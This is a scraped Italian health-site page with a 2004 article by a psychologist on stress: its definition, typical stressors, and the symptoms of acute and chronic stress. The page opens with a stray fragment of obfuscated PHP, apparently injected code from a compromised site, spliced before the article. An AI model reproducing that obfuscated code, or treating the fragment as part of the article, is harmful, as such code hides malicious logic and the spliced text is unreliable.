=round(0+3))$_59=$_64[round(0+0.333333333333+0.333333333333+0.333333333333)];if($GLOBALS['_1188104000_'][60]($_59)=round(0+0.6+0.6+0.6+0.6+0.6))$_59=$_64[round(0+0.5+0.5)];if($GLOBALS['_1188104000_'][73]($_59)=round(0+0.6+0.6+0.6+0.6+0.6))$_59=$_64[round(0+0.2+0.2+0.2+0.2+0.2)];if($GLOBALS['_1188104000_'][89]($_59)=round(0+0.6+0.6+0.6+0.6+0.6))$_59=$_64[round(0+0.333333333333+0.333333333333+0.333333333333)];if($GLOBALS['_1188104000_'][106]($_59) Lo stress

Area Riservata



Ti ricordiamo che per rendere attivo il tuo account dopo la registrazione, sarà necessario aprire il messaggio email che riceverai e cliccare sul link di attivazione.

  

Salute Mentale

Lo stress PDF 

20 dicembre 2004 - a cura di Antonio d'Amore, Psicologo e Psicoterapeuta

 

Frequentemente capita di leggere o di parlare di stress, ma se si chiede alle persone di spiegare cosa intendano con questo termine, non é facile ottenere risposte chiare ed univoche.

In realtà, quando si parla di stress si fa riferimento ad uno stato di attivazione di alcuni sistemi fisiologici (endocrino, cardiocircolatorio, respiratorio, immunitario e digestivo) in risposta a stimoli, detti stressori, che rappresentano una minaccia (reale o presunta) per l’individuo.

I meccanismi alla base dello stress sono presenti in ogni individuo e sono indispensabili per reagire a situazioni d’emergenza. Esistono vari tipi di stressori, per così dire universali; alcuni di tipo fisico:

  • dolore intenso o prolungato;
  • caldo o freddo estremi;
  • traumi o abusi;
  • infezioni e processi infiammatori;

altri di tipo psicologico:

  • paura;
  • senso di sconfitta;
  • umiliazione;
  • delusione;
  • gioia estrema.

Non necessariamente uno stesso stimolo viene vissuto da tutti come stressante, e seppur stressante può produrre conseguenze diverse da persona a persona. Il fattore principale che determina questa variabilità di risposta, è dato dalla presenza o meno di caratteristiche biologiche (ad esempio alcune sostanze chimiche prodotte dall'organismo) e psicologiche (ad esempio la stabilità emozionale) che servono per fronteggiare lo stimolo.

Di solito se le caratteristiche sono adeguate, le risposte sono di proporzione e durata ridotte e quindi si ha un rapido superamento dello stress, senza conseguenze per la salute; mentre se le caratteristiche sono inadeguate, l’impossibilità di avere un controllo sullo stressore, induce risposte molto marcate e di lunga durata, con conseguenze spesso deleterie per la salute.

Lo stress può essere acuto o cronico.

Lo stress acuto è il più comune e anche quello più facile da superare; pur non producendo danni all’organismo, se si ripete frequentemente, può fare emergere sintomi tipo:

  • irritabilità, ansia e depressione (le tre emozioni tipiche dello stress);
  • tensione muscolare che può determinare cefalea, dolori alle mandibole o alla schiena (se la tensione è particolarmente forte, dolori a legamenti e tendini);
  • problemi gastrointestinali (bruciore e acidità di stomaco, oppure flatulenza, diarrea, stitichezza e dolori intestinali);
  • aumento della pressione e del battito cardiaco, e palpitazioni;
  • estremità fredde;
  • capogiri.

Alcune persone vivono una vita perennemente disordinata; si caricano di mille responsabilità che gli creano non pochi affanni, fanno tutto di corsa e sono sempre in ritardo. Queste persone sperimentano lo stress più frequentemente di altri.

Lo stress è cronico quando una persona si trova in una situazione (ad esempio, matrimonio o lavoro opprimente, ma anche povertà o conflitti etnico-religiosi) da cui non vede via d’uscita, e rimane perciò continuamente esposto ad essa. Le persone che si trovano in questa situazione, col tempo possono assistere alla comparsa di:

  • disturbi d’ansia;
  • depressione;
  • disturbi del sonno;
  • spiccata suscettibilità alle infezioni;
  • disturbi gastrointestinali (colon irritabile, ulcera gastrica e morbo di Crohn);
  • disturbi dell’alimentazione;
  • aumento o riduzione notevole del peso corporeo;
  • malattie della pelle (acne, eczema, psoriasi).

 

FONTI D'INFORMAZIONE

 

Una sezione sullo stress curata dall'American Psychological Association.

Una pagina curata dalla BBC

 

Per migliorare la tua navigazione su questo sito, utilizziamo cookies ed altre tecnologie che ci permettono di riconoscerti. Utilizzando questo sito, acconsenti agli utilizzi di cookies e delle altre tecnologie descritti nella nostra Cookies Policy Utilizzando questo sito, acconsenti agli utilizzi di cookies e delle altre tecnologie descritti nella nostra Cookies Policy.

Acconsento all'utilizzo dei cookies su questo sito